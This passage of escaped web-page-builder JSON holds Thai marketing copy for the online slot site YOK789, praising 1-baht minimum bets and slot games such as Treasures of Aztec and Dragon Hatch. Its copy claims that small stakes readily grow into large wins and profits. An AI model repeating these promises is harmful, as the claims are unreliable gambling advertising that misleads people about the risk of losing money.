\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e42\\u0e0a\\u0e04\\u0e41\\u0e15\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e2a\\u0e1b\\u0e35\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Treasures of Azte<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Treasures of Aztec \\u0e21\\u0e32\\u0e43\\u0e19\\u0e18\\u0e35\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e22\\u0e18\\u0e23\\u0e23\\u0e21\\u0e25\\u0e36\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e17\\u0e2d\\u0e07\\u0e41\\u0e25\\u0e30\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e02\\u0e38\\u0e21\\u0e17\\u0e23\\u0e31\\u0e1e\\u0e22\\u0e4c \\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 YOK \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21 <\\/span><b>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 \\u0e1a\\u0e32\\u0e17<\\/b> <span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32 \\u0e21\\u0e35\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e25\\u0e30\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e40\\u0e01\\u0e21\\u0e18\\u0e35\\u0e21\\u0e2a\\u0e21\\u0e1a\\u0e31\\u0e15\\u0e34\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e21\\u0e31\\u0e01\\u0e21\\u0e35\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e38\\u0e48\\u0e21\\u0e41\\u0e15\\u0e01\\u0e44\\u0e27 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e40\\u0e01\\u0e47\\u0e1a\\u0e01\\u0e33\\u0e44\\u0e23 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e41\\u0e19\\u0e27\\u0e1c\\u0e25\\u0e44\\u0e21\\u0e49\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e40\\u0e23\\u0e47\\u0e27 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e15\\u0e31\\u0e49\\u0e07\\u0e40\\u0e1a\\u0e17\\u0e15\\u0e48\\u0e33\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e25\\u0e30\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e08\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e1b\\u0e25\\u0e48\\u0e32 \\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e41\\u0e25\\u0e30\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e23\\u0e07\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e15\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e47\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07 